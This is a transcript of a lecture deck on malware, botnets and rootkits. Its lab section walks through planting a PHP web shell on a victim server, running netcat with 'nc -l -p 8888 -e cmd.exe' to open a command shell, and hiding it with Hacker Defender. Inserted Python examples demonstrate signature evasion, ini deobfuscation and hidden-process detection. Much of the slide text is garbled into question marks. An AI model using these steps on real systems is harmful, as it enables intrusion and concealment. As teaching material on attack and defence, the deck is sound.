Module 11: ?????????????
Transcript of a PowerPoint presentation, 106 slides (provided by: boak)

1
Module 11 ?????????????
2
????
  • ??????????????Botnet????????,?????????????????????
    ??????????????????????,??????????????
  • 2. ?????????????
  • (1)??????()
  • (2)???????????()
  • (3)???? - Botnet()
  • (4)???? - Rootkits()
  • (5)Rootkit????????()
  • (6)?????????()
  • ??????

3
Module 11?????????????
  • Module 11-1??????()
  • Module 11-2???????????()
  • Module 11-3???? - Botnet()
  • Module 11-4???? - Rootkits()
  • Module 11-5Rootkit????????()
  • Module 11-6?????????()

??(basic)??????? ??(moderate)???????????,???
??????? ??(advanced)??????????
4
  • Module 11-1??????()

5
??
  • ??????????????????????????(script),???????????????
    ?????????,???????????????????
  • ????????????????????,??????????,????????Port??????
    ,???????????????????
  • ????????????

6
??
  • ????????????,????????????????????

7
??????
  • ????????????????????????????????
  • ????????????,????????
  • ??(Virus)
  • ??(Worm)
  • ?????(Trojan horse)
  • Rootkits
  • ???????????,????????????????,?????????????????????
    ???????

8
?????? - ??(Virus)
  • ?????????,????????????,????
  • ?????????,???????????
  • ?????????????????
  • ????????????????,????????,???CMOS?Flash BIOS?????

9
?????? - ??(Worm)
  • ??????,????????????
  • ????????????,??????,?????????
  • ??????????
  • ??????,?????
  • ??????????????????
  • ???????????????????

10
?????? - ?????(Trojan horse)
  • ?????????????????,???????????????????,??????????
  • ??????????,?????????????????????
  • ?????????
  • Universal????????
  • Transitive????????,???????

11
??????
Prefix   Description
XF       Excel????
W32      32???,????32?Windows??
WINT     32?Windows??,???Windows NT
Troj     ?????
VBS      VBScript?????????
VSM      ?? Visio VBA???script????script??
JS       JScript?????????
  • ????????1991?,?CARO(Computer Antivirus
    Researchers Organization)???????????,???????????
  • <??????>://<??>/<family??>.<group??>.<infective_??>.<??>.<?????>

Example: virus://w32/Beast.41472.A
???? The Art of Computer Virus Research and Defense
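As an added worked example (editor's code, not from the slides or from CARO), here is a small parser for names in the form shown above. It splits a name into type, prefix, family, group, infective length, variant and modifiers, and gives a vendor-neutral key for correlating detections from different products. The prefix descriptions are the editor's own, taken from the usual CARO/vendor meanings, because the slide's descriptions did not survive extraction; the `VBS/Example...` name used when running it is constructed.

```python
"""Parser for CARO-style malware names (added example; not from the slides)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Prefixes from the slide's table. The descriptions are the editor's, since
# the slide's own text did not survive extraction.
PREFIXES = {
    "XF":   "Excel formula (XF) macro",
    "W32":  "32-bit Windows, any 32-bit Windows version",
    "WINT": "32-bit Windows, Windows NT family only",
    "TROJ": "Trojan horse",
    "VBS":  "VBScript",
    "VSM":  "Visio VBA macro/script",
    "JS":   "JScript",
}

# <malware_type>://<prefix>/<family>.<group>.<infective_length>.<variant>.<modifiers>
_NAME = re.compile(
    r"^(?:(?P<type>[A-Za-z]+)://)?"         # malware type, e.g. virus://   (optional)
    r"(?:(?P<prefix>[A-Za-z0-9]+)/)?"       # platform/type prefix, e.g. W32/ (optional)
    r"(?P<family>[A-Za-z][A-Za-z0-9_-]*)"   # family name, e.g. Beast
    r"(?P<rest>(?:\.[A-Za-z0-9_@-]+)*)$"    # dotted components after the family
)


@dataclass
class CaroName:
    malware_type: Optional[str]
    prefix: Optional[str]
    family: str
    group: Optional[str] = None
    infective_length: Optional[int] = None
    variant: Optional[str] = None
    modifiers: List[str] = field(default_factory=list)

    @property
    def prefix_description(self) -> str:
        return PREFIXES.get((self.prefix or "").upper(), "unknown prefix")

    def key(self) -> str:
        """Vendor-neutral key for correlating detections: prefix/family.variant."""
        base = "/".join(p for p in (self.prefix, self.family) if p).lower()
        return f"{base}.{self.variant}" if self.variant else base


def parse_caro(name: str) -> CaroName:
    m = _NAME.match(name.strip())
    if not m:
        raise ValueError(f"not a CARO-style name: {name!r}")
    parsed = CaroName(m["type"], m["prefix"], m["family"])
    components = m["rest"].lstrip(".").split(".") if m["rest"] else []
    for part in components:
        # Heuristic slot assignment: digits are the infective length, one to
        # three capitals are the variant, an earlier word is the group name.
        if part.isdigit() and parsed.infective_length is None:
            parsed.infective_length = int(part)          # e.g. 41472
        elif re.fullmatch(r"[A-Z]{1,3}", part) and parsed.variant is None:
            parsed.variant = part                         # e.g. A
        elif (parsed.group is None and parsed.infective_length is None
              and parsed.variant is None):
            parsed.group = part                           # group precedes length/variant
        else:
            parsed.modifiers.append(part)                 # devolution/modifier suffixes
    return parsed


if __name__ == "__main__":
    for sample in ("virus://w32/Beast.41472.A", "VBS/Example.Group.1234.C.mod"):
        n = parse_caro(sample)
        print(sample, "->", n, "|", n.prefix_description, "| key:", n.key())
```

The slot assignment after the family is a heuristic: a group name that happens to be one to three capital letters would be read as a variant, which is why the key only relies on prefix, family and variant.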
12
??????????
2008 FBI/CSI Survey ???? http://i.cmpnet.com/v2.gocsi.com/pdf/CSIsurvey2008.pdf
13
?????????? (?)
2007???????
14
??????????
  • ???????????,??????
  • ?????????
  • ???????????????
  • ????????,????????????
  • ????????,??????????????
  • ???????????????,????????????

15
?????????
  • ?????????????,??????????????(?????????????),??????
    ???
  • ???????????????
  • ????
  • ???????
  • ????
  • ?????????????????
  • ?????
  • ???????

16
  • Module 11-2???????????()

17
????????
  • ????????????,??????????,????????
  • ????
  • ??????
  • IM (Internet Message)??
  • Email
  • P2P????
  • ?????

18
???????????
  • ??????
  • ????????????????????
  • ??RegisterServiceProcess??????????
  • DLL injection
  • ?????
  • ?????????????????????
  • ???????????????????
  • ???????????
  • ?????

19
??????
  • DLL Injection??????????,?????????????
  • ????????????DLL??????
  • ??SetWindowsHookEx??,????DLL??????????,???????????
    ?DLL??
  • API Hooking
  • API?Windows??????,????????DLL Injection???????????
    ???API

20
?????(Packer)
  • ?????????????????,????????????,???????????????????
    ????
  • ?????????????????????????,???????????,????????????
    ???????
  • ?????????????????

21
???????????
  • ????????????????
  • ???????????
  • ?????????
  • ????????????????????????,?????????????????????????
    ???
  • ???????(Anti-VM or Anti-Emulator)

22
????????(Polymorphism)
  • ??????????????????,??????????????,?????????
  • ?

?????
    MOV AX, 0E88        ; set key 1
    MOV DI, AX
    MOV BX, [BP+0D2B]   ; pick next word

?????
    MOV AX, 0E88        ; set key 1
    INC SI              ; ??
    MOV DI, AX
    CLC                 ; ??
    NOP                 ; ??
    MOV BX, [BP+0D2B]   ; pick next word
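An added example (editor's code, not from the slides) that encodes the two forms above as 16-bit x86 bytes and shows the point of the slide in working code: a fixed byte signature taken from the original form does not match a variant with filler instructions inserted, while a scanner that decodes the bytes and discards the filler still recognises it. The tiny assembler covers only the mnemonics on the slide; the encodings used (B8 iw, 89 C7, 8B 9E disp16, 46, F8, 90) are the standard ones. The `mutate` function is the editor's stand-in for a mutation engine and is seeded so each variant is reproducible.

```python
"""Polymorphic decryptor variants versus fixed byte signatures (added example)."""
import random
import re

# Filler instructions the mutation engine may insert between real ones. They
# change nothing the decryptor depends on (INC SI only because SI is dead here).
JUNK = ("NOP", "CLC", "INC SI")

ORIGINAL = ["MOV AX, 0E88", "MOV DI, AX", "MOV BX, [BP+0D2B]"]
SLIDE_VARIANT = ["MOV AX, 0E88", "INC SI", "MOV DI, AX", "CLC", "NOP",
                 "MOV BX, [BP+0D2B]"]


def assemble(ins):
    """16-bit x86 encoding for the handful of mnemonics used on the slide."""
    op = " ".join(ins.upper().split())
    if op == "NOP":
        return b"\x90"
    if op == "CLC":
        return b"\xf8"
    if op == "INC SI":
        return b"\x46"
    if op == "MOV DI, AX":
        return b"\x89\xc7"                   # MOV r/m16, r16 with ModRM 11 000 111
    m = re.fullmatch(r"MOV AX, ([0-9A-F]{1,4})", op)
    if m:                                    # MOV AX, imm16
        return b"\xb8" + int(m.group(1), 16).to_bytes(2, "little")
    m = re.fullmatch(r"MOV BX, \[BP\+([0-9A-F]{1,4})\]", op)
    if m:                                    # MOV BX, [BP+disp16]
        return b"\x8b\x9e" + int(m.group(1), 16).to_bytes(2, "little")
    raise ValueError(f"unsupported instruction: {ins!r}")


def assemble_block(instrs):
    return b"".join(assemble(i) for i in instrs)


def mutate(instrs, seed):
    """One polymorphic variant: the same real instructions with 0-2 random
    filler instructions after each. The seed makes the variant reproducible."""
    rng = random.Random(seed)
    out = []
    for ins in instrs:
        out.append(ins)
        out.extend(rng.choice(JUNK) for _ in range(rng.randint(0, 2)))
    return out


def disassemble(code):
    """Inverse of assemble(); rejects bytes outside the tiny opcode table."""
    i, out = 0, []
    while i < len(code):
        b = code[i]
        if b == 0x90:
            out.append("NOP")
            i += 1
        elif b == 0xF8:
            out.append("CLC")
            i += 1
        elif b == 0x46:
            out.append("INC SI")
            i += 1
        elif code[i:i + 2] == b"\x89\xc7":
            out.append("MOV DI, AX")
            i += 2
        elif b == 0xB8:
            out.append(f"MOV AX, {int.from_bytes(code[i + 1:i + 3], 'little'):04X}")
            i += 3
        elif code[i:i + 2] == b"\x8b\x9e":
            out.append(f"MOV BX, [BP+{int.from_bytes(code[i + 2:i + 4], 'little'):04X}]")
            i += 4
        else:
            raise ValueError(f"unknown opcode {b:02X} at offset {i}")
    return out


def signature_hit(code, signature):
    """A plain byte-string scanner: does the signature occur verbatim?"""
    return signature in code


def normalize(code):
    """What a scanner that decodes the code and discards filler compares on."""
    return [ins for ins in disassemble(code) if ins not in JUNK]


if __name__ == "__main__":
    sig = assemble_block(ORIGINAL)
    for label, variant in [("slide variant", SLIDE_VARIANT), ("seed 7", mutate(ORIGINAL, 7))]:
        code = assemble_block(variant)
        print(f"{label}: {code.hex()}  byte signature hit={signature_hit(code, sig)}"
              f"  normalized match={normalize(code) == ORIGINAL}")
```

Real engines also reorder independent instructions and swap equivalent encodings (89 C7 versus 8B F8 for the same move), which defeats this filler-stripping normalizer as well; that is why production scanners emulate the decryptor and scan the decrypted body instead.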
23
?????????
  • ???????????????
  • ??????
  • ????
  • ????
  • ??????
  • ?????(checksum)
  • ???????

24
?????? - ????
  • ????????????????,????????????,????????????
  • ?????
  • ????????????
  • ???????IDA Pro?OllyDbg
  • ????
  • ???????????,???????,????????????
  • ??????PEiD
  • ????????????????????

25
?????? - ????
  • ????????,????,??????????????????????,?????????????
    ??
  • ????????,????????????,??????????????????
  • ?????????????????????
  • ??????????,?????????
  • CWSandbox?????????
  • (http://www.cwsandbox.org/)

26
??????
  • ????????????
  • ????
  • ??????????
  • ?????
  • ????
  • ??????????

27
  • Module 11-3???? - Botnet()

28
??????
  • Botrobot???,?????????????,??????????????,????????
    ???
  • Zombie(????)???Bot???,?????????
  • Botnet????Bot????????,????????????

29
Botnet????
  • ???????Botnet?????????????Botnet,?????
  • ?????????,Botnet????????????,????????????????????

30
Botnet??
  • ?IRC Botnet??
  • ???IRC Botnet????IRC Server???????,?????IRC
    Server?????????????
  • ???????IRC Server???,?????????
  • ?????????????????,????????????,?????????????,????
    ????????
  • ???????????????????DoS??
  • ?????????,??????

31
Botnet??????????
??/??          ???     ???     ???     ????
Bot            ????    ????    ?       ?????????
Trojan horse   ?       ??      ?       ?????????
Worm           ????    ?/?     ?/?     ???????
Spyware        ?       ?       ????    ????
Virus          ????    ?       ?       ????
???? http://zh.wikipedia.org/w/index.php?title=%E6%AE%AD%E5%B1%8D%E7%B6%B2%E7%B5%A1&variant=zh-tw
32
Botnet?????
  • ??????,????????????
  • ????????????????????,??????????????????,?????????(
    2011-04-20)

???? http://www.symantec.com/business/threatreport/index.jsp
33
Botnet?????
  • Botnet???????????????????
  • ??
  • ??
  • ??

34
Botnet????
Bot????
35
Botnet????
  • ???????????????????Bot???,??????????????Botnet???
  • ?IRC Botnet??,?????????????(Bot),???????????????(C
    C/IRC Server)?????,?????????????

36
Botnet????
Bot????
37
Botnet???
  • Botnet???
  • Gartner?2008???75??????Bot
  • ????????????????????Bot
  • FBIBotnet?????????
  • ?10?????1.1???????????
  • ???????,????????,??????????????????????????????,??
    Bot????????????

????( botnet)??????? ???? http://tw.trendmicro.com/tw/support/tech-support/board/tech/article/20081007100643.html
38
Botnet??? (?)
  • ??Botnet??????,??????????
  • ??????
  • ???????,?????????????????????,????????????????????
    ??(DDoS)
  • ??????
  • Botnet??????????????,????????????????????IP??,????
    ???????

39
Botnet??? (?)
  • ????
  • ????????????????????????????
  • Bot???????(Sniffer)???????,???????????
  • ????
  • ????????,????????????,??????????????????????
  • ?????????????,?????????????

Mentors Research Interest: Botnet?? ???? http://mentorwang.blogspot.com/2008/07/botnet.html
40
  • Module 11-4???? - Rootkits()

41
Rootkits??
  • Rootkits?Root?kits?????
  • Root ? Unix????????,??Unix????????
  • kits ?????????????
  • Rootkits
  • ???????????????????
  • ???????,??????????

42
Rootkits??
  • Rootkits?????????????????????????
  • Rootkits ??
  • User mode (ring 3)
  • Kernel mode (ring 0)
  • ???? (ring -1)
  • SMM mode (ring -2)

43
User Mode Rootkits
  • ??
  • IAT Hook
  • Inline function patch
  • ?? - easy for everything
  • ???????
  • ????

44
Kernel Mode Rootkits
  • ??
  • SSDT hook
  • IDT hook
  • Layered driver
  • Inline function patch
  • ?? - hard for everything
  • ???????,???????????
  • ???????Rootkits???

45
????Rootkits
  • Virtual Machine Based Rootkits
  • Samuel T. King Peter M. Chen?2006???
  • ??????????

[Figure: privilege layers stacked top to bottom: RING 0-3, RING -1, RING -2, Host Hardware]
46
SMM mode????()
  • ????CPU SMM mode??Rootkits
  • ?Joanna Rutkowska??????2009???
  • ?????????????,??????????????
  • ?????????Rootkits????

47
SMM mode Rootkits()
  • SMM mode - System Management Mode
  • ???CPU??????
  • ??????
  • ?????????????
  • ?????????
  • SMM mode???????????
  • ??????????
  • SMM mode???????????????
  • ?Rootkits??????????????????????,???????

[Figure: RAM map with ordinary (Common) regions and a separate SMRAM region]
48
???? - Sony??????????Rootkits??
  • ??
  • ??????????,??Sony????Rootkit??,?MicroVault
    USB?????????Windows???????,??????????????F-Secure?
    ???????,??????Sony?MicroVault USB?,????????????,??
    ??????,?????????????,?????????????????,?????????,?
    ??????????????,??????????,???????????

???? http://www.ithome.com.tw/itadm/article.php?c=45063
49
??
  • ?????????????,?????????????????,????????????????
  • ?????????????????????,?????????????????????????
  • ??????????,???????????????

50
  • Module 11-5Rootkit????????()

51
Rootkit???????(?Root Shell??)
52
??????
  • ?Testbed?????,??????????

Victim (HTTP Server): OS: Windows XP SP2, IP: 10.1.1.3
Attacker: OS: Windows XP SP2, IP: 10.1.1.2
53
???? on Testbed@TWISC - ?????????
54
??
  • ??Victim??????????,??????
  • NetCat (nc.exe)??telnet????Shell??????????????
  • Root Shell???????,?NetCat????????? Root Shell??????
  • Hacker Defender???????Rootkit??,?????????????????
    (Hacker Defender 1.0.0)
  • ?Victim??????,??????
  • Avira AntiVir
  • ??????Avira????????????

55
??????? - NetCat
  • ??
  • NetCat 1.11 (nc.exe)
  • ??????
  • Microsoft Windows
  • ????
  • http://www.megaupload.com/?d=PQCHRLCX
  • ??????
  • Attacker??

56
??????? - NetCat (?)
57
??????? - Rootshell
  • ??
  • Rootshell.v.2.0.php
  • ??????
  • Microsoft Windows
  • ????
  • http://www.megaupload.com/?d=TANMWUVH
  • ??????
  • Victim??

58
??????? - Rootshell (?)
  • Rootshell

59
??????? - Hacker Defender
  • ??
  • Hacker Defender 1.0.0
  • ??????
  • Microsoft Windows
  • ????
  • http://www.megaupload.com/?d=UV8WRCHJ
  • ??????
  • Attacker??

60
??????? - Hacker Defender (?)
  • Hacker Defender (defender v1.0.0???????)

File             Size       Description
hxdef100.exe     70 144 B   Hacker Defender v1.0.0 ???
hxdef100.ini     3 872 B    ini ????
hxdef100.2.ini   3 695 B    ini ????, ?2?
bdcli100.exe     26 624 B   ?????
rdrbs100.exe     49 152 B   redirectors base
readmecz.txt     34 654 B   ????????
readmeen.txt     35 956 B   ??????
readmefr.txt     38 029 B   ??????
src.zip          91 936 B   ???
readmezh.txt     38 029 B   ??????
61
??????? - Hacker Defender (?)
  • Hacker Defender(????????)

Section            Description
Hidden Table       ???????
Root Processes     ????
Hidden Services    ????
Hidden RegKeys     ??RegKeys??
Hidden RegValues   ??RegValues
Startup Run        ????????
Free Space         ??????
Hidden Ports       ??port
Settings           hxdef???
62
??Rootkit?? - Avira AntiVir
  • ??
  • Avira AntiVir Personal - FREE Antivirus
  • ??????
  • Microsoft Windows
  • ????
  • http://www.free-av.com/de/trialpay_download/1/avira_antivir_personal__free_antivirus.html
  • ??????
  • Victim??

63
??Rootkit?? - Avira AntiVir (?)
  • ??Avira ???????,??Rootkit???,??????????

64
????
  • ????
  • Victim?????HTTP Server
  • Victim?????Rootshell (Rootshell.v.2.0.php)
  • Attacker???Victim????
  • Attacker?????
  • ??Rootshell??,???nc.exe?Victim??
  • ???????
  • ??????????
  • Victim?????
  • ??????????

65
???? (?)
  • ???????????????,?Victim???????????????
  • ??????
  • ????
  • ??Rootshell???NetCat
  • ????
  • ????
  • Victim?????

66
????
  • ?????????????Victim??,??????,?????
  • ????????????????,?????????Victim????

67
???? (?)
  • ?Victim?????Appserv,???HTTP Server
  • Appserv????
  • http://prdownloads.sourceforge.net/appserv/appserv-win32-2.5.10.exe?download

68
???? (?)
69
???? (?)
70
???? (?)
  • ?????
  • ?Rootshell????Appserv?www???

71
??Root Shell???NetCat
  • ?Victim?????IP??

72
??Root Shell???NetCat (?)
  • ?Attacker???????,??Victim???IP?Rootshell????,?????
    ?

73
??Root Shell???NetCat (?)
  • Attacker????Rootshell?nc.exe???Victim??

74
??Root Shell???NetCat (?)
  • ?Victim???C:\Appserv\www\??nc.exe??????

75
????
  • ?Attacker????? Root Shell??nc -l -p 8888 -e cmd.exe,?Victim??????
  • ?Execute?,?????????,???????,????????

76
???? (?)
  • ?Victim?????Process Explorer??,??Victim????Attacke
    r??????
  • Process Explorer????
  • http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx
  • ???????nc.exe????,??????????????????
  • ??,?????????nc.exe??,????????

77
???? (?)
78
???? (?)
  • ?nc.exe????,??????

79
???? (?)
  • ????????,?Attacker??????????
  • ????????????,?????????nc.exe??,????????

80
???? (?)
  • ????????,?Attacker??????????
  • ??rm phpinfo.php???phpinfo.php,??Victim????

81
????
  • ?Attacker?????Hacker Defender??hxdef100.ini,?Hidd
    en Processes??????
  • [\<Hi<>dden" P/r>oc"/e<ss>es\\>]
    n"c.ex"e
    rc<md\.ex<e
  • Hacker Defender drops its filler characters when it reads the ini, so these lines are read as [Hidden Processes], nc.exe and rcmd.exe; the obfuscation exists only to keep the ini from matching a plain signature.
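An added example (editor's code, not the slides' and not Hacker Defender's own) that reads an hxdef-style ini the way the rootkit does: it strips the filler characters the parser ignores, splits the result into the sections listed on the earlier slide, and then answers whether a given process or file name would be hidden. Assumptions: the ignored-character set `| < > : \ / "` is the one given in the hxdef100 readme as the editor recalls it, so check it against the readme in the package; the sample ini is constructed from the default section names, the slide's obfuscated Hidden Processes entry (read without the space the extraction shows in the rcmd line) and the well-known default password line.

```python
"""Deobfuscating reader for Hacker Defender style ini files (added example)."""
import fnmatch
from typing import Dict, List

# Filler characters hxdef ignores when reading its ini (assumed set, taken from
# the hxdef100 readme as recalled; verify against your copy).
IGNORED = set('|<>:\\/"')


def deobfuscate(line: str) -> str:
    """Drop filler characters and surrounding whitespace, as the rootkit's parser does."""
    return "".join(ch for ch in line if ch not in IGNORED).strip()


def parse_hxdef_ini(text: str) -> Dict[str, List[str]]:
    """Return {section name: [cleaned entries]} for an obfuscated or plain ini."""
    sections: Dict[str, List[str]] = {}
    current = None
    for raw in text.splitlines():
        line = deobfuscate(raw)
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def is_hidden(sections: Dict[str, List[str]], section: str, name: str) -> bool:
    """Case-insensitive wildcard match, e.g. 'hxdef*' hides hxdef100.exe."""
    return any(fnmatch.fnmatch(name.lower(), pat.lower())
               for pat in sections.get(section, []))


# Constructed sample: default section names, the slide's Hidden Processes lines
# and the default Settings password line, all in the obfuscated spelling.
OBFUSCATED_INI = r'''
[H<<<idden T>>a/"ble]
>h"xdef"*
r|cmd\.ex<e

[\<Hi<>dden" P/r>oc"/e<ss>es\\>]
n"c.ex"e
rc<md\.ex<e

[S\e<t/t\i<n/g\s<]
P\a:s"s"w\o:r/d=h:x"d\e:f-\r"u:l<e\z
'''


if __name__ == "__main__":
    cfg = parse_hxdef_ini(OBFUSCATED_INI)
    for section, entries in cfg.items():
        print(f"[{section}] {entries}")
    for proc in ("nc.exe", "NC.EXE", "explorer.exe"):
        state = "hidden" if is_hidden(cfg, "Hidden Processes", proc) else "visible"
        print(f"{proc}: {state}")
```

For detection this cuts both ways: a signature written for the plain `hxdef100.ini` never fires on the obfuscated copy, so a scanner has to normalise the file (as `deobfuscate` does) before matching, and the recovered `Settings` section tells an incident responder the backdoor password and service names to look for.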

82
???? (?)
  • ??????????,??Victim???IP?Rootshell????
  • Attacker???Root Shell???????

83
???? (?)
  • Attacker???Rootshell???hxdef100.exe
  • ?Victim???nc.exe??????
  • ???Victim??,Process Explorer?????????nc.exe

84
???? (?)
85
???? (?)
  • ????????????,????????

86
Victim?????
  • Victim????Avira AntiVir????,??????Rootkit????????,
    ?????????
  • ??Avira AntiVir???????

87
Victim?????
  • ????????

88
Victim?????
  • ????

89
Victim?????
  • ??????

90
??
  • ?Rootkit????,???????
  • ?????Rootkit
  • ???????
  • ????
  • ?Rootkit????,???AntiRootkit????
  • ??Avira AntiRootkit??????
  • ???files?registry?processes?driver????
  • ???????????????,????????????????Rootkit
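Cross-view comparison is the idea behind an anti-rootkit scan of files, registry, processes and drivers: take the same inventory two ways and report what the high-level view omits. The added example below (editor's code, not Avira's) does this for processes on Linux, since the lab's Windows XP host cannot be reproduced here. The high-level view is a /proc directory walk, which is what ps, top and Process Explorer-style tools rely on; the low-level view asks the kernel PID by PID with kill(pid, 0). A user-mode rootkit that filters directory-listing APIs, as Hacker Defender does on Windows, does not see the second path. On Windows the equivalent check is a brute-force OpenProcess over the PID range compared against CreateToolhelp32Snapshot.

```python
"""Cross-view hidden-process check for Linux (added example; editor's code)."""
import os


def listed_pids():
    """High-level view: a /proc directory walk, the same source ps, top and
    Process Explorer-style tools use. Thread IDs are included so that a
    non-leader thread (which kill() also accepts) is not reported as hidden."""
    pids = set()
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pids.add(int(entry))
        try:
            pids.update(int(t) for t in os.listdir(f"/proc/{entry}/task") if t.isdigit())
        except OSError:
            pass  # the process exited between the two listdir calls
    return pids


def probed_pids(max_pid):
    """Low-level view: ask the kernel PID by PID with kill(pid, 0), which
    bypasses the directory-listing code path a user-mode rootkit filters."""
    found = set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)
        except ProcessLookupError:
            continue          # ESRCH: no such process
        except PermissionError:
            pass              # EPERM: exists, but belongs to another user
        found.add(pid)
    return found


def hidden_pids(listed, probed):
    """PIDs the kernel confirms but the listing omits."""
    return set(probed) - set(listed)


def scan(max_pid=None):
    """Run both views and report PIDs absent from the listing on both sides
    of the probe, so processes that start or exit mid-scan are not flagged."""
    if max_pid is None:
        with open("/proc/sys/kernel/pid_max") as f:
            max_pid = int(f.read())
    before = listed_pids()
    probed = probed_pids(max_pid)
    after = listed_pids()
    return hidden_pids(before | after, probed)


if __name__ == "__main__":
    suspects = scan()
    print("hidden PIDs:", sorted(suspects) if suspects else "none")
```

Two caveats before trusting a hit: a /proc mounted with hidepid=2 makes other users' processes legitimately unlisted but still EPERM-probable, so run the scan as root or compare against what /proc/<pid>/status reveals; and a kernel-mode rootkit that hooks the syscall layer can lie to kill() as well, so this only catches the user-mode class the lab uses.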

91
? ?
92
???
  • ???Botnet?????

93
???
  • ??????????Botnet???(???Botnet???),???????????????
    ??

94
???
  • ?????,???????Rootkit???????,?????

95
???
  • ??,????????????????Rootkit

96
Module 11-6 ?????????()
97
??????
  • ??????????????Rootkit????

98
??????
  • A????????????,????Root Shell??,?????????????NetCat
    ??????,??????????,???????,???????
  • ???????,??????
  • ??????Root Shell?NetCat???????
  • ??Hacker Defender????

99
?????? (?)
  • ????B????,????????????Rootkit,????????????,???????
    ?
  • ???????,??????
  • ??Avira Antivir????
  • ??Avira Antivir????

100
?????
Victim: OS: Windows XP SP2, IP: 10.0.1.2, ????: AppServ
Attacker: OS: Windows XP SP2, IP: 10.0.1.1
AppServ???: http://www.appservnetwork.com
101
??????
  • ?????????,???????????
  • ?? 2011.06.01 23:59 ?????? evannolimit@gmail.com
  • ????????????????

102
????
  • ???????????? http://www.libertytimes.com.tw/2008/new/apr/30/today-life7.htm
  • ??????????? http://www.cib.gov.tw/news/news02_2.aspx?no=261
  • CNN???????!?????????? http://www.nownews.com/2008/08/07/339-2316527.htm
  • ???????????? http://www.media.edu.cn/wang_luo_an_quan_5177/20060630/t20060630_186389.shtml
  • ????-???? http://zh.wikipedia.org/w/index.php?title=%E6%AE%AD%E5%B1%8D%E7%B6%B2%E7%B5%A1&variant=zh-tw
  • Mentors Research Interest: Botnet?? http://mentorwang.blogspot.com/2008/07/Botnet.html

103
???? (?)
  • Spam Statistics from TRACE (Marshal)
  • http://www.marshal.com/TRACE/spam_statistics.asp
  • ??????Backdoor.Rustock.A??
  • http://ccnet.tnua.edu.tw/cert-news/viewtopic.php?p=19&sid=c3133b653ed47a4918045a4b434bc9c0
  • the new p0f 2.0.8 (2006-09-06)
  • http://lcamtuf.coredump.cx/p0f.shtml
  • rpmfind.net
  • http://rpmfind.net/linux/RPM/index.html
  • Conficker?????W32.Waledac??????
  • http://rogerspeaking.com/2009/04/2024

104
???? (?)
  • Kaspersky, ????????Rootkit, 2006/10/05 18:50
  • VirusList ???????, Viruslist.com, 2005
  • Anton Chuvakin, An Overview of Unix Rootkits, iDEFENSE, 2003
  • TWCERT/CC
  • www.cert.org.tw/document/
  • Greg Hoglund and James Butler, Rootkits: Subverting the Windows Kernel, Addison-Wesley, 2006
  • Nancy Altholz and Larry Stevenson, Rootkits for Dummies, For Dummies, 2007
  • Wikipedia Encyclopedia
  • http://en.wikipedia.org/wiki/Rootkit

105
???? (?)
  • Chkrootkit
  • www.chkrootkit.org
  • Rootkit Hunter
  • http://www.rootkit.nl/
  • http://www.microsoft.com/taiwan/technet/columns/profwin/19-Rootkits.mspx
  • http://www.ithome.com.tw/itadm/article.php?c=45063